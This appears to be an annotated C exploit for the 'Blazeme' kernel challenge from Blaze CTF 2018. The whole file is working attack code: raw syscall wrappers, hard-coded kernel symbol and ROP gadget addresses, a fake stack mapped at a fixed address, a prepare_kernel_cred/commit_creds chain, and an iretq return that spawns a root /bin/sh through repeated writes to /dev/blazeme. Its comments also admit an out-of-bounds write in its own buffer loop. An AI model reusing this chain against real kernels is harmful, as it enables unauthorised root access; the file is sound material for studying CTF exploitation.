Blaze CTF 2018 Blazeme
// gcc -fno-builtin -static -nostdlib -masm=intel exp.c -o exp
// Build notes: -nostdlib means every libc-looking name used in this file (exit,
// read, write, open, close, mmap, execve, strlen, puts, memset) is the local
// definition below, and -masm=intel is what the "mov dst, src" operand order in
// the inline asm relies on. No -O flag is given, so the asm wrappers are compiled
// without optimisation, which several of them silently depend on.
#define O_RDWR 0x0002
#define KBUF_LEN (64)            // number of bytes written to the device per write()
#define PROT_READ 0x1 /* Page can be read. */
#define PROT_WRITE 0x2 /* Page can be written. */
#define MAP_PRIVATE 0x02 /* Changes are private. */   // not used by name: _start passes the literal 0x32
#define MAP_ANONYMOUS 0x20 /* Don't use a file. */    // not used by name (part of 0x32)
#define MAP_POPULATE 0x8000      // pre-fault the mapping so the first kernel-side access does not take a page fault
#define MAP_FIXED 0x10           // not used by name (part of 0x32 == MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED)
#define MAP_GROWSDOWN 0x0100     // defined but unused in this file
// syscalls | |
// Raw exit(2) wrapper: syscall number 60 on x86-64 Linux. The status `e` is
// already in rdi (the SysV first-argument register is also the first syscall
// argument register), so only rax is loaded. There is no clobber list and the
// asm is split over two statements, so this only works if the compiler leaves
// rdi untouched in between — true for the -O0 build in the header comment, not
// guaranteed in general.
void exit(int e) {
    __asm__("mov rax, 60");
    __asm__("syscall");
    __builtin_unreachable();    // tells the compiler control never reaches here
}
// Raw read(2) wrapper: syscall number 0. fd/buf/size are already in rdi/rsi/rdx.
// There is no return statement: the caller sees whatever `syscall` left in rax,
// which is the kernel's result only because nothing runs between the syscall and
// the function epilogue at -O0 (formally undefined behaviour in C11 when the
// caller uses the value). No clobber list, although `syscall` overwrites rcx and
// r11 and the statement writes rax.
int read(int fd, char* buf, int size) {
    __asm__("mov rax, 0");
    __asm__("syscall");
}
// Raw write(2) wrapper: syscall number 1. fd/buf/size are already in rdi/rsi/rdx.
// Same caveats as the other wrappers: no return statement (the value in rax
// after `syscall` is what the caller happens to get at -O0) and no clobber list
// for rax/rcx/r11. Failures come back as negative errno values, not -1/errno.
int write(int fd, char* buf, int size) {
    __asm__("mov rax, 1");
    __asm__("syscall");
}
// Raw open(2) wrapper: syscall number 2. pathname/flags are already in rdi/rsi;
// the third syscall argument (mode) is never set, so rdx holds whatever the
// caller left there — harmless without O_CREAT, but worth knowing. No return
// statement and no clobber list, as with the other wrappers; a failure is a
// negative errno in the returned value (which _start checks with `fd < 0`).
int open(char* pathname, int flags) {
    __asm__("mov rax, 2");
    __asm__("syscall");
}
// Raw close(2) wrapper: syscall number 3. fd is already in rdi. Not called
// anywhere in this file. Same no-return / no-clobber caveats as the wrappers above.
int close(unsigned int fd) {
    __asm__("mov rax, 3");
    __asm__("syscall");
}
// Raw mmap(2) wrapper: syscall number 9. The SysV argument registers are
// rdi, rsi, rdx, rcx, r8, r9, but the kernel takes the 4th syscall argument in
// r10 because `syscall` itself destroys rcx — hence the `mov r10, rcx` that
// moves `flags` into place. The other five arguments are already where the
// kernel expects them. No return statement: the caller gets whatever rax holds
// after the call, and on failure that is a negative errno value rather than
// MAP_FAILED (the caller in _start does not check it).
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
    __asm__("mov r10, rcx");
    __asm__("mov rax, 9");
    __asm__("syscall");
}
// Raw execve(2) wrapper: syscall number 59. filename/argv/envp are already in
// rdi/rsi/rdx. Only returns on failure (negative errno in rax); the no-return /
// no-clobber caveats of the other wrappers apply.
int execve(char *filename, char *const argv[], char *const envp[]) {
    __asm__("mov rax, 59");
    __asm__("syscall");
}
// helper functions | |
// Libc-free strlen: number of bytes in buf before the first NUL.
// buf must be NUL-terminated; there is no bound on the scan.
unsigned long strlen(char* buf) {
    char *cursor = buf;
    while (*cursor) {
        cursor++;
    }
    return (unsigned long)(cursor - buf);
}
// Libc-free puts: writes buf to fd 1 followed by a single newline, using the
// raw write wrapper. Return values of write() are not checked (same as libc
// callers here would expect nothing back — the function is void).
void puts(char *buf) {
    unsigned long len = strlen(buf);
    write(1, buf, len);
    write(1, "\n", 1);
}
// Libc-free memset: stores the low byte of c into each of the first len bytes
// of s. Returns nothing (unlike the libc signature), and len == 0 is a no-op.
void memset(char* s, int c, unsigned long len) {
    char *end = s + len;
    for (char *p = s; p < end; p++) {
        *p = (char)c;
    }
}
// Final user-mode target of the chain: replaces this process with /bin/sh
// (argv = {"/bin/sh", NULL}, empty environment). execve only returns on
// failure, in which case the process exits with status 0.
static void shell() {
    static char *const argv[] = { "/bin/sh", 0 };
    execve(argv[0], argv, 0);
    exit(0);
}
// The addresses below are hard-coded for the challenge's kernel image: the first
// two lines look like System.map / nm output, the rest like ROP-gadget search
// output. They are only valid for that exact build with no kernel address
// randomisation (TODO confirm the KASLR state of the challenge VM — not visible here).
// ffffffff81063b50 T prepare_kernel_cred
// ffffffff81063960 T commit_creds
// 0xffffffff8109c604: mov esp, 0x01740000 ; ret ; (1 found)
// 0xffffffff811664cc: pop rdi ; ret ; (27 found)
// 0xffffffff81085026: mov rdi, rax ; call rdx ; (12 found)
// 0xffffffff81148e10: pop rdx ; ret ; (19 found)
// 0xffffffff811d20dd: xor rax, rax ; ret ; (26 found)
unsigned long prepare_kernel_cred = 0xffffffff81063b50;   // kernel symbol, first call in the chain
unsigned long commit_creds = 0xffffffff81063960;          // kernel symbol; the chain uses commit_creds + 6
unsigned long pop_rdx = 0xffffffff81148e10;               // pop rdx ; ret
unsigned long pop_rdi = 0xffffffff811664cc;               // pop rdi ; ret
unsigned long mov_rdi_rax_call_rdx = 0xffffffff81085026;  // mov rdi, rax ; call rdx
unsigned long xor_rax_ret = 0xffffffff811d20dd;           // xor rax, rax ; ret
unsigned long pivot_gadget = 0xffffffff8109c604;          // mov esp, 0x01740000 ; ret — moves the kernel stack onto the user page _start maps at that address
unsigned long user_cs;        // captured by save_state(), placed in the iretq frame by restore_state()
unsigned long user_ss;        // same
unsigned long user_rflags;    // same
unsigned long shell_v = shell;  // function pointer stored in an integer without a cast (a C constraint violation GCC only warns about); becomes the return RIP in restore_state()
// Captures the user-mode CS and SS selectors and RFLAGS into globals so that
// restore_state() can build an iretq frame that returns to ring 3 later.
// Notes on the inline asm:
//  - "r=" is an unusual spelling of the output constraint documented as "=r";
//    the matching "r" input is only a dummy (TODO confirm the compiler used
//    accepts "r=" without changing operand semantics).
//  - pushfq and popq are separate asm statements with no clobber list, so the
//    compiler is never told rsp must not move between them; it holds at -O0.
static void save_state() {
    __asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs));      // user_cs = CS
    __asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss));      // user_ss = SS
    __asm__("pushfq");                                           // push RFLAGS ...
    __asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags));  // ... and pop it into user_rflags
}
// Tail of the ROP chain: returns from ring 0 to ring 3 into shell() on a fresh
// user stack. It is reached by the chain's final `ret` (its address is the last
// qword _start stores), so it executes on the pivoted stack.
// The five stores build an x86-64 iretq frame at the current rsp — RIP, CS,
// RFLAGS, RSP, SS in ascending address order — without adjusting rsp first, so
// they overwrite whatever is on top of the stack at that moment. The new user
// RSP is 0x01740000, which lies inside the 2-page region _start mapped.
// swapgs restores the user GS base before the return, undoing the swap done
// on kernel entry. Asm caveats: the `mov [rsp+..], %0` statements declare the
// global as an "r=" output with a dummy "r" input, so %0 is the *output*
// register and only holds the value if the compiler happens to assign the same
// register to both operands (evidently the case in this build); there is no
// clobber list for rax; one asm statement per instruction.
static void restore_state() {
    __asm__("swapgs");
    __asm__("mov [rsp+0x20], %0": "r=" (user_ss) : "r" (user_ss));          // SS
    __asm__("mov rax, 0x01740000");
    __asm__("mov [rsp+0x18], rax");                                          // RSP = top of the user page
    __asm__("mov [rsp+0x10], %0": "r=" (user_rflags) : "r" (user_rflags));  // RFLAGS
    __asm__("mov [rsp+0x08], %0": "r=" (user_cs) : "r" (user_cs));          // CS
    __asm__("mov [rsp+0x00], %0": "r=" (shell_v) : "r" (shell_v));          // RIP = shell
    __asm__("iretq");
}
// Program entry (no libc, so the loader calls _start directly). Sequence:
// save the user segment state, open the target device, lay out a ROP chain on a
// user page at a fixed address, then repeatedly write a buffer consisting of a
// 2-byte prefix and copies of the stack-pivot gadget to the device.
void _start(void) {
    int fd;
    char buf[KBUF_LEN];
    int i;
    unsigned long* fake_stack;
    save_state();
    fd = open("/dev/blazeme", O_RDWR);
    if (fd < 0) {                      // raw syscall: errors are negative errno values
        puts("open() failure");
        exit(1);
    }
    // 0x32 == MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED (the macros exist above but the
    // literal is used). The 2-page mapping covers 0x0173f000..0x01741000 so that
    // 0x01740000 — the value the pivot gadget loads into esp — has valid memory
    // on both sides. The integer-to-pointer first argument is implicit (GCC
    // warns), and the result is never checked: a failed mmap would leave a
    // negative errno in fake_stack and the stores below would fault.
    fake_stack = mmap(0x01740000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0);
    fake_stack += (0x1000/ sizeof(unsigned long));   // now exactly 0x01740000, where the pivoted kernel rsp lands
    // The chain, one qword per `ret`: prepare_kernel_cred(0), then commit_creds
    // on its result via the mov rdi,rax ; call rdx gadget, then restore_state().
    *fake_stack ++= pop_rdi;
    *fake_stack ++= 0;                     //   rdi = 0
    *fake_stack ++= prepare_kernel_cred;   //   rax = prepare_kernel_cred(0)
    *fake_stack ++= pop_rdx;
    *fake_stack ++= commit_creds + 6;      //   rdx = commit_creds + 6 (the +6 presumably skips the function's first instruction(s) — cannot confirm from here)
    *fake_stack ++= mov_rdi_rax_call_rdx;  //   rdi = rax ; call rdx — the call's return address is pushed into the slot just consumed, and what follows `call rdx` in the gadget is not shown here
    *fake_stack ++= xor_rax_ret;           //   rax = 0
    *fake_stack ++= restore_state;         //   back to ring 3 (function pointer stored as unsigned long without a cast; GCC warns)
    memset(buf, 'a', 2);                   // 2-byte prefix; why the gadget copies start at offset 2 is not visible here (presumably matches the driver's buffer layout — TODO confirm)
    for (i = 0; i<KBUF_LEN/8 ; i++) {
        // DEFECT: i runs 0..7, so the last store covers buf[58..65], two bytes
        // past the 64-byte array — an out-of-bounds stack write in this program
        // itself (only the first KBUF_LEN bytes are sent anyway). The cast is
        // also an unaligned, strict-aliasing-violating access; fine at -O0 on x86.
        unsigned long *p = (unsigned long*)(buf+2+i*8);
        *p = pivot_gadget;
    }
    while (1) {                            // never exits normally; presumably a write eventually redirects kernel control into the chain, which ends in shell()
        write(fd, buf, KBUF_LEN);
    }
    exit(0);                               // unreachable
}